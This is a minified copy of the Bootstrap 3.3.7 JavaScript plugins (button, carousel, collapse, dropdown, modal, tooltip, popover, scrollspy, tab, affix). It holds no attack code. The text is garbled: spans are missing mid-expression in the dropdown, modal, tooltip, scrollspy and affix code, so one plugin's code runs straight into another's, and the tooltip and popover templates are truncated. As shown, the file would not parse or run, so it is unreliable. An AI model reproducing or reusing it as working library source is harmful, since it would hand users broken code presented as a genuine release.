d=a(this),e=d.data("bs.button"),f="object"==typeof b&&b;e||d.data("bs.button",e=new c(this,f)),"toggle"==b?e.toggle():b&&e.setState(b)})}var c=function(b,d){this.$element=a(b),this.options=a.extend({},c.DEFAULTS,d),this.isLoading=!1};c.VERSION="3.3.7",c.DEFAULTS={loadingText:"loading..."},c.prototype.setState=function(b){var c="disabled",d=this.$element,e=d.is("input")?"val":"html",f=d.data();b+="Text",null==f.resetText&&d.data("resetText",d[e]()),setTimeout(a.proxy(function(){d[e](null==f[b]?this.options[b]:f[b]),"loadingText"==b?(this.isLoading=!0,d.addClass(c).attr(c,c).prop(c,!0)):this.isLoading&&(this.isLoading=!1,d.removeClass(c).removeAttr(c).prop(c,!1))},this),0)},c.prototype.toggle=function(){var a=!0,b=this.$element.closest('[data-toggle="buttons"]');if(b.length){var c=this.$element.find("input");"radio"==c.prop("type")?(c.prop("checked")&&(a=!1),b.find(".active").removeClass("active"),this.$element.addClass("active")):"checkbox"==c.prop("type")&&(c.prop("checked")!==this.$element.hasClass("active")&&(a=!1),this.$element.toggleClass("active")),c.prop("checked",this.$element.hasClass("active")),a&&c.trigger("change")}else this.$element.attr("aria-pressed",!this.$element.hasClass("active")),this.$element.toggleClass("active")};var d=a.fn.button;a.fn.button=b,a.fn.button.Constructor=c,a.fn.button.noConflict=function(){return a.fn.button=d,this},a(document).on("click.bs.button.data-api",'[data-toggle^="button"]',function(c){var d=a(c.target).closest(".btn");b.call(d,"toggle"),a(c.target).is('input[type="radio"], input[type="checkbox"]')||(c.preventDefault(),d.is("input,button")?d.trigger("focus"):d.find("input:visible,button:visible").first().trigger("focus"))}).on("focus.bs.button.data-api blur.bs.button.data-api",'[data-toggle^="button"]',function(b){a(b.target).closest(".btn").toggleClass("focus",/^focus(in)?$/.test(b.type))})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.carousel"),f=a.extend({},c.DEFAULTS,d.data(),"object"==typeof b&&b),g="string"==typeof b?b:f.slide;e||d.data("bs.carousel",e=new c(this,f)),"number"==typeof b?e.to(b):g?e[g]():f.interval&&e.pause().cycle()})}var c=function(b,c){this.$element=a(b),this.$indicators=this.$element.find(".carousel-indicators"),this.options=c,this.paused=null,this.sliding=null,this.interval=null,this.$active=null,this.$items=null,this.options.keyboard&&this.$element.on("keydown.bs.carousel",a.proxy(this.keydown,this)),"hover"==this.options.pause&&!("ontouchstart"in document.documentElement)&&this.$element.on("mouseenter.bs.carousel",a.proxy(this.pause,this)).on("mouseleave.bs.carousel",a.proxy(this.cycle,this))};c.VERSION="3.3.7",c.TRANSITION_DURATION=600,c.DEFAULTS={interval:5e3,pause:"hover",wrap:!0,keyboard:!0},c.prototype.keydown=function(a){if(!/input|textarea/i.test(a.target.tagName)){switch(a.which){case 37:this.prev();break;case 39:this.next();break;default:return}a.preventDefault()}},c.prototype.cycle=function(b){return b||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},c.prototype.getItemIndex=function(a){return this.$items=a.parent().children(".item"),this.$items.index(a||this.$active)},c.prototype.getItemForDirection=function(a,b){var c=this.getItemIndex(b),d="prev"==a&&0===c||"next"==a&&c==this.$items.length-1;if(d&&!this.options.wrap)return b;var e="prev"==a?-1:1,f=(c+e)%this.$items.length;return this.$items.eq(f)},c.prototype.to=function(a){var b=this,c=this.getItemIndex(this.$active=this.$element.find(".item.active"));if(!(a>this.$items.length-1||a<0))return this.sliding?this.$element.one("slid.bs.carousel",function(){b.to(a)}):c==a?this.pause().cycle():this.slide(a>c?"next":"prev",this.$items.eq(a))},c.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.support.transition&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},c.prototype.next=function(){if(!this.sliding)return this.slide("next")},c.prototype.prev=function(){if(!this.sliding)return this.slide("prev")},c.prototype.slide=function(b,d){var e=this.$element.find(".item.active"),f=d||this.getItemForDirection(b,e),g=this.interval,h="next"==b?"left":"right",i=this;if(f.hasClass("active"))return this.sliding=!1;var j=f[0],k=a.Event("slide.bs.carousel",{relatedTarget:j,direction:h});if(this.$element.trigger(k),!k.isDefaultPrevented()){if(this.sliding=!0,g&&this.pause(),this.$indicators.length){this.$indicators.find(".active").removeClass("active");var l=a(this.$indicators.children()[this.getItemIndex(f)]);l&&l.addClass("active")}var m=a.Event("slid.bs.carousel",{relatedTarget:j,direction:h});return a.support.transition&&this.$element.hasClass("slide")?(f.addClass(b),f[0].offsetWidth,e.addClass(h),f.addClass(h),e.one("bsTransitionEnd",function(){f.removeClass([b,h].join(" ")).addClass("active"),e.removeClass(["active",h].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger(m)},0)}).emulateTransitionEnd(c.TRANSITION_DURATION)):(e.removeClass("active"),f.addClass("active"),this.sliding=!1,this.$element.trigger(m)),g&&this.cycle(),this}};var d=a.fn.carousel;a.fn.carousel=b,a.fn.carousel.Constructor=c,a.fn.carousel.noConflict=function(){return a.fn.carousel=d,this};var e=function(c){var d,e=a(this),f=a(e.attr("data-target")||(d=e.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,""));if(f.hasClass("carousel")){var g=a.extend({},f.data(),e.data()),h=e.attr("data-slide-to");h&&(g.interval=!1),b.call(f,g),h&&f.data("bs.carousel").to(h),c.preventDefault()}};a(document).on("click.bs.carousel.data-api","[data-slide]",e).on("click.bs.carousel.data-api","[data-slide-to]",e),a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var c=a(this);b.call(c,c.data())})})}(jQuery),+function(a){"use strict";function b(b){var c,d=b.attr("data-target")||(c=b.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,"");return a(d)}function c(b){return this.each(function(){var c=a(this),e=c.data("bs.collapse"),f=a.extend({},d.DEFAULTS,c.data(),"object"==typeof b&&b);!e&&f.toggle&&/show|hide/.test(b)&&(f.toggle=!1),e||c.data("bs.collapse",e=new d(this,f)),"string"==typeof b&&e[b]()})}var d=function(b,c){this.$element=a(b),this.options=a.extend({},d.DEFAULTS,c),this.$trigger=a('[data-toggle="collapse"][href="#'+b.id+'"],[data-toggle="collapse"][data-target="#'+b.id+'"]'),this.transitioning=null,this.options.parent?this.$parent=this.getParent():this.addAriaAndCollapsedClass(this.$element,this.$trigger),this.options.toggle&&this.toggle()};d.VERSION="3.3.7",d.TRANSITION_DURATION=350,d.DEFAULTS={toggle:!0},d.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},d.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b,e=this.$parent&&this.$parent.children(".panel").children(".in, .collapsing");if(!(e&&e.length&&(b=e.data("bs.collapse"),b&&b.transitioning))){var f=a.Event("show.bs.collapse");if(this.$element.trigger(f),!f.isDefaultPrevented()){e&&e.length&&(c.call(e,"hide"),b||e.data("bs.collapse",null));var g=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[g](0).attr("aria-expanded",!0),this.$trigger.removeClass("collapsed").attr("aria-expanded",!0),this.transitioning=1;var h=function(){this.$element.removeClass("collapsing").addClass("collapse in")[g](""),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return h.call(this);var i=a.camelCase(["scroll",g].join("-"));this.$element.one("bsTransitionEnd",a.proxy(h,this)).emulateTransitionEnd(d.TRANSITION_DURATION)[g](this.$element[0][i])}}}},d.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse in").attr("aria-expanded",!1),this.$trigger.addClass("collapsed").attr("aria-expanded",!1),this.transitioning=1;var e=function(){this.transitioning=0,this.$element.removeClass("collapsing").addClass("collapse").trigger("hidden.bs.collapse")};return a.support.transition?void this.$element[c](0).one("bsTransitionEnd",a.proxy(e,this)).emulateTransitionEnd(d.TRANSITION_DURATION):e.call(this)}}},d.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()},d.prototype.getParent=function(){return a(this.options.parent).find('[data-toggle="collapse"][data-parent="'+this.options.parent+'"]').each(a.proxy(function(c,d){var e=a(d);this.addAriaAndCollapsedClass(b(e),e)},this)).end()},d.prototype.addAriaAndCollapsedClass=function(a,b){var c=a.hasClass("in");a.attr("aria-expanded",c),b.toggleClass("collapsed",!c).attr("aria-expanded",c)};var e=a.fn.collapse;a.fn.collapse=c,a.fn.collapse.Constructor=d,a.fn.collapse.noConflict=function(){return a.fn.collapse=e,this},a(document).on("click.bs.collapse.data-api",'[data-toggle="collapse"]',function(d){var e=a(this);e.attr("data-target")||d.preventDefault();var f=b(e),g=f.data("bs.collapse"),h=g?"toggle":e.data();c.call(f,h)})}(jQuery),+function(a){"use strict";function b(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#[A-Za-z]/.test(c)&&c.replace(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}function c(c){c&&3===c.which||(a(e).remove(),a(f).each(function(){var d=a(this),e=b(d),f={relatedTarget:this};e.hasClass("open")&&(c&&"click"==c.type&&/input|textarea/i.test(c.target.tagName)&&a.contains(e[0],c.target)||(e.trigger(c=a.Event("hide.bs.dropdown",f)),c.isDefaultPrevented()||(d.attr("aria-expanded","false"),e.removeClass("open").trigger(a.Event("hidden.bs.dropdown",f)))))}))}function d(b){return this.each(function(){var c=a(this),d=c.data("bs.dropdown");d||c.data("bs.dropdown",d=new g(this)),"string"==typeof b&&d[b].call(c)})}var e=".dropdown-backdrop",f='[data-toggle="dropdown"]',g=function(b){a(b).on("click.bs.dropdown",this.toggle)};g.VERSION="3.3.7",g.prototype.toggle=function(d){var e=a(this);if(!e.is(".disabled, :disabled")){var f=b(e),g=f.hasClass("open");if(c(),!g){"ontouchstart"in document.documentElement&&!f.closest(".navbar-nav").length&&a(document.createElement("div")).addClass("dropdown-backdrop").insertAfter(a(this)).on("click",c);var h={relatedTarget:this};if(f.trigger(d=a.Event("show.bs.dropdown",h)),d.isDefaultPrevented())return;e.trigger("focus").attr("aria-expanded","true"),f.toggleClass("open").trigger(a.Event("shown.bs.dropdown",h))}return!1}},g.prototype.keydown=function(c){if(/(38|40|27|32)/.test(c.which)&&!/input|textarea/i.test(c.target.tagName)){var d=a(this);if(c.preventDefault(),c.stopPropagation(),!d.is(".disabled, :disabled")){var e=b(d),g=e.hasClass("open");if(!g&&27!=c.which||g&&27==c.which)return 27==c.which&&e.find(f).trigger("focus"),d.trigger("click");var h=" li:not(.disabled):visible a",i=e.find(".dropdown-menu"+h);if(i.length){var j=i.index(c.target);38==c.which&&j>0&&j--,40==c.which&&jdocument.documentElement.clientHeight;this.$element.css({paddingLeft:!this.bodyIsOverflowing&&a?this.scrollbarWidth:"",paddingRight:this.bodyIsOverflowing&&!a?this.scrollbarWidth:""})},c.prototype.resetAdjustments=function(){this.$element.css({paddingLeft:"",paddingRight:""})},c.prototype.checkScrollbar=function(){var a=window.innerWidth;if(!a){var b=document.documentElement.getBoundingClientRect();a=b.right-Math.abs(b.left)}this.bodyIsOverflowing=document.body.clientWidth
',trigger:"hover focus",title:"",delay:0,html:!1,container:!1,viewport:{selector:"body",padding:0}},c.prototype.init=function(b,c,d){if(this.enabled=!0,this.type=b,this.$element=a(c),this.options=this.getOptions(d),this.$viewport=this.options.viewport&&a(a.isFunction(this.options.viewport)?this.options.viewport.call(this,this.$element):this.options.viewport.selector||this.options.viewport),this.inState={click:!1,hover:!1,focus:!1},this.$element[0]instanceof document.constructor&&!this.options.selector)throw new Error("`selector` option must be specified when initializing "+this.type+" on the window.document object!");for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this));else if("manual"!=g){var h="hover"==g?"mouseenter":"focusin",i="hover"==g?"mouseleave":"focusout";this.$element.on(h+"."+this.type,this.options.selector,a.proxy(this.enter,this)),this.$element.on(i+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.getOptions=function(b){return b=a.extend({},this.getDefaults(),this.$element.data(),b),b.delay&&"number"==typeof b.delay&&(b.delay={show:b.delay,hide:b.delay}),b},c.prototype.getDelegateOptions=function(){var b={},c=this.getDefaults();return this._options&&a.each(this._options,function(a,d){c[a]!=d&&(b[a]=d)}),b},c.prototype.enter=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);return c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusin"==b.type?"focus":"hover"]=!0),c.tip().hasClass("in")||"in"==c.hoverState?void(c.hoverState="in"):(clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?void(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show)):c.show())},c.prototype.isInStateTrue=function(){for(var a in this.inState)if(this.inState[a])return!0;return!1},c.prototype.leave=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);if(c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusout"==b.type?"focus":"hover"]=!1),!c.isInStateTrue())return clearTimeout(c.timeout),c.hoverState="out",c.options.delay&&c.options.delay.hide?void(c.timeout=setTimeout(function(){"out"==c.hoverState&&c.hide()},c.options.delay.hide)):c.hide()},c.prototype.show=function(){var b=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){this.$element.trigger(b);var d=a.contains(this.$element[0].ownerDocument.documentElement,this.$element[0]);if(b.isDefaultPrevented()||!d)return;var e=this,f=this.tip(),g=this.getUID(this.type);this.setContent(),f.attr("id",g),this.$element.attr("aria-describedby",g),this.options.animation&&f.addClass("fade");var h="function"==typeof this.options.placement?this.options.placement.call(this,f[0],this.$element[0]):this.options.placement,i=/\s?auto?\s?/i,j=i.test(h);j&&(h=h.replace(i,"")||"top"),f.detach().css({top:0,left:0,display:"block"}).addClass(h).data("bs."+this.type,this),this.options.container?f.appendTo(this.options.container):f.insertAfter(this.$element),this.$element.trigger("inserted.bs."+this.type);var k=this.getPosition(),l=f[0].offsetWidth,m=f[0].offsetHeight;if(j){var n=h,o=this.getPosition(this.$viewport);h="bottom"==h&&k.bottom+m>o.bottom?"top":"top"==h&&k.top-mo.width?"left":"left"==h&&k.left-lg.top+g.height&&(e.top=g.top+g.height-i)}else{var j=b.left-f,k=b.left+f+c;jg.right&&(e.left=g.left+g.width-k)}return e},c.prototype.getTitle=function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||("function"==typeof c.title?c.title.call(b[0]):c.title)},c.prototype.getUID=function(a){do a+=~~(1e6*Math.random());while(document.getElementById(a));return a},c.prototype.tip=function(){if(!this.$tip&&(this.$tip=a(this.options.template),1!=this.$tip.length))throw new Error(this.type+" `template` option must consist of exactly 1 top-level element!");return this.$tip},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},c.prototype.enable=function(){this.enabled=!0},c.prototype.disable=function(){this.enabled=!1},c.prototype.toggleEnabled=function(){this.enabled=!this.enabled},c.prototype.toggle=function(b){var c=this;b&&(c=a(b.currentTarget).data("bs."+this.type),c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c))),b?(c.inState.click=!c.inState.click,c.isInStateTrue()?c.enter(c):c.leave(c)):c.tip().hasClass("in")?c.leave(c):c.enter(c)},c.prototype.destroy=function(){var a=this;clearTimeout(this.timeout),this.hide(function(){a.$element.off("."+a.type).removeData("bs."+a.type),a.$tip&&a.$tip.detach(),a.$tip=null,a.$arrow=null,a.$viewport=null,a.$element=null})};var d=a.fn.tooltip;a.fn.tooltip=b,a.fn.tooltip.Constructor=c,a.fn.tooltip.noConflict=function(){return a.fn.tooltip=d,this}}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.popover"),f="object"==typeof b&&b;!e&&/destroy|hide/.test(b)||(e||d.data("bs.popover",e=new c(this,f)),"string"==typeof b&&e[b]())})}var c=function(a,b){this.init("popover",a,b)};if(!a.fn.tooltip)throw new Error("Popover requires tooltip.js");c.VERSION="3.3.7",c.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:''}),c.prototype=a.extend({},a.fn.tooltip.Constructor.prototype),c.prototype.constructor=c,c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.setContent=function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.options.html?"html":"text"](b),a.find(".popover-content").children().detach().end()[this.options.html?"string"==typeof c?"html":"append":"text"](c),a.removeClass("fade top bottom left right in"),a.find(".popover-title").html()||a.find(".popover-title").hide()},c.prototype.hasContent=function(){return this.getTitle()||this.getContent()},c.prototype.getContent=function(){var a=this.$element,b=this.options;return a.attr("data-content")||("function"==typeof b.content?b.content.call(a[0]):b.content)},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")};var d=a.fn.popover;a.fn.popover=b,a.fn.popover.Constructor=c,a.fn.popover.noConflict=function(){return a.fn.popover=d,this}}(jQuery),+function(a){"use strict";function b(c,d){this.$body=a(document.body),this.$scrollElement=a(a(c).is(document.body)?window:c),this.options=a.extend({},b.DEFAULTS,d),this.selector=(this.options.target||"")+" .nav li > a",this.offsets=[],this.targets=[],this.activeTarget=null,this.scrollHeight=0,this.$scrollElement.on("scroll.bs.scrollspy",a.proxy(this.process,this)),this.refresh(),this.process()}function c(c){return this.each(function(){var d=a(this),e=d.data("bs.scrollspy"),f="object"==typeof c&&c;e||d.data("bs.scrollspy",e=new b(this,f)),"string"==typeof c&&e[c]()})}b.VERSION="3.3.7",b.DEFAULTS={offset:10},b.prototype.getScrollHeight=function(){return this.$scrollElement[0].scrollHeight||Math.max(this.$body[0].scrollHeight,document.documentElement.scrollHeight)},b.prototype.refresh=function(){var b=this,c="offset",d=0;this.offsets=[],this.targets=[],this.scrollHeight=this.getScrollHeight(),a.isWindow(this.$scrollElement[0])||(c="position",d=this.$scrollElement.scrollTop()),this.$body.find(this.selector).map(function(){var b=a(this),e=b.data("target")||b.attr("href"),f=/^#./.test(e)&&a(e);return f&&f.length&&f.is(":visible")&&[[f[c]().top+d,e]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){b.offsets.push(this[0]),b.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scrollTop()+this.options.offset,c=this.getScrollHeight(),d=this.options.offset+c-this.$scrollElement.height(),e=this.offsets,f=this.targets,g=this.activeTarget;if(this.scrollHeight!=c&&this.refresh(),b>=d)return g!=(a=f[f.length-1])&&this.activate(a);if(g&&b=e[a]&&(void 0===e[a+1]||b .dropdown-menu > .active").removeClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!1),b.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",!0),h?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu").length&&b.closest("li.dropdown").addClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!0),e&&e()}var g=d.find("> .active"),h=e&&a.support.transition&&(g.length&&g.hasClass("fade")||!!d.find("> .fade").length);g.length&&h?g.one("bsTransitionEnd",f).emulateTransitionEnd(c.TRANSITION_DURATION):f(),g.removeClass("in")};var d=a.fn.tab;a.fn.tab=b,a.fn.tab.Constructor=c,a.fn.tab.noConflict=function(){return a.fn.tab=d,this};var e=function(c){c.preventDefault(),b.call(a(this),"show")};a(document).on("click.bs.tab.data-api",'[data-toggle="tab"]',e).on("click.bs.tab.data-api",'[data-toggle="pill"]',e)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.affix"),f="object"==typeof b&&b;e||d.data("bs.affix",e=new c(this,f)),"string"==typeof b&&e[b]()})}var c=function(b,d){this.options=a.extend({},c.DEFAULTS,d),this.$target=a(this.options.target).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this)),this.$element=a(b),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};c.VERSION="3.3.7",c.RESET="affix affix-top affix-bottom",c.DEFAULTS={offset:0,target:window},c.prototype.getState=function(a,b,c,d){var e=this.$target.scrollTop(),f=this.$element.offset(),g=this.$target.height();if(null!=c&&"top"==this.affixed)return e=a-d&&"bottom"},c.prototype.getPinnedOffset=function(){if(this.pinnedOffset)return this.pinnedOffset;this.$element.removeClass(c.RESET).addClass("affix");var a=this.$target.scrollTop(),b=this.$element.offset();return this.pinnedOffset=b.top-a},c.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)},c.prototype.checkPosition=function(){if(this.$element.is(":visible")){var b=this.$element.height(),d=this.options.offset,e=d.top,f=d.bottom,g=Math.max(a(document).height(),a(document.body).height());"object"!=typeof d&&(f=e=d),"function"==typeof e&&(e=d.top(this.$element)),"function"==typeof f&&(f=d.bottom(this.$element));var h=this.getState(g,b,e,f);if(this.affixed!=h){null!=this.unpin&&this.$element.css("top","");var i="affix"+(h?"-"+h:""),j=a.Event(i+".bs.affix");if(this.$element.trigger(j),j.isDefaultPrevented())return;this.affixed=h,this.unpin="bottom"==h?this.getPinnedOffset():null,this.$element.removeClass(c.RESET).addClass(i).trigger(i.replace("affix","affixed")+".bs.affix")}"bottom"==h&&this.$element.offset({top:g-b-f})}};var d=a.fn.affix;a.fn.affix=b,a.fn.affix.Constructor=c,a.fn.affix.noConflict=function(){return a.fn.affix=d,this},a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var c=a(this),d=c.data();d.offset=d.offset||{},null!=d.offsetBottom&&(d.offset.bottom=d.offsetBottom),null!=d.offsetTop&&(d.offset.top=d.offsetTop),b.call(c,d)})})}(jQuery); --------------------------------------------------------------------------------